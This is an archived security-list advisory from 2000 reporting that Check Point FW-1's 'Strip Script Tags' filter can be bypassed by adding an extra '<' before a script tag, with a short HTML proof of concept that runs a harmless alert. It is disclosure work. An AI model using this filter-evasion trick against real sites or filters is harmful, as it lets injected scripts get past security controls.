Computer Security

Archive : 2000 : january : fw1js
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku





"Strip Script Tags" in FW-1 can be circumvented




"Strip Script Tags" in FW-1 can be circumvented






=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Сб, 29 янв 2000  04:12:47

   От: Arne Vidstrom <arne.vidstrom@NTSECURITY.NU>

 Кому: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

 Тема: "Strip Script Tags" in FW-1 can be circumvented

--------------------------------------------------------------------------------




Hi,



The "Strip Script Tags" in FW-1 can be circumvented by adding an extra <

before the <SCRIPT> tag like in this code:



<HTML>

<HEAD>

<<SCRIPT LANGUAGE="JavaScript">

alert("hello world")

</SCRIPT>

</HEAD>

<BODY>

test

</BODY>

</HTML>



This code will pass unchanged, and still execute in both Navigator and

Explorer. I tried this on version 3.0 of FW-1 (on Windows NT 4.o) but I'm

not able to check it on version 4.0 since I don't have access to it.





Regards /Arne Vidstrom
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru